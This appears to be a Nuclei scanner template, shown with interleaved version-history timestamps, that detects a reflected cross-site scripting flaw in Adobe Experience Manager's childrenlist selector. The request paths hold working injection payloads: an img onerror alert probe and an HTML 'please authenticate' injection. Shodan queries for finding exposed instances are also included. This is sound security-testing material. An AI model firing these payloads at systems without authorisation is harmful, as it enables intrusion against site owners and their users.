2023-01-15 13:29:59 +00:00
id : aem-xss-childlist
info :
2023-03-08 19:11:33 +00:00
name : Adobe Experience Manager Childlist Selector - Cross-Site Scripting
2023-01-15 13:29:59 +00:00
author : theabhinavgaur
severity : medium
description : |
2023-03-08 19:11:33 +00:00
Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the childlist selector when a dispatcher does not respect the content type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser.
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cwe-id : CWE-80
2023-01-15 13:29:59 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-01-15 13:29:59 +00:00
verified : true
shodan-query :
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
2023-06-02 23:20:49 +00:00
tags : xss,aem,adobe,misconfig
2023-01-15 13:29:59 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-01-15 13:29:59 +00:00
- method : GET
path :
2023-01-16 17:35:08 +00:00
- "{{BaseURL}}/{{rand_base(4)}}<img src=x data'a'onerror=alert(domain)>.childrenlist.html"
- "{{BaseURL}}/{{rand_base(4)}}<br><br>please%20authenticate<br><br>.childrenlist.html"
2023-01-15 13:29:59 +00:00
2023-01-16 17:35:08 +00:00
stop-at-first-match : true
2023-01-16 17:48:47 +00:00
matchers-condition : and
2023-01-15 13:29:59 +00:00
matchers :
- type : word
part : body
words :
- '<img src="x" data onerror="alert(domain)"/>'
2023-01-16 17:48:47 +00:00
- '<br /><br />please authenticate<br /><br />'
condition : or
2023-01-16 08:07:20 +00:00
- type : word
part : body
words :
2023-01-15 13:29:59 +00:00
- 'data-coral-columnview-id'
2023-01-16 17:41:46 +00:00
- type : word
part : content_type
words :
- 'text/html'
- type : status
status :
- 200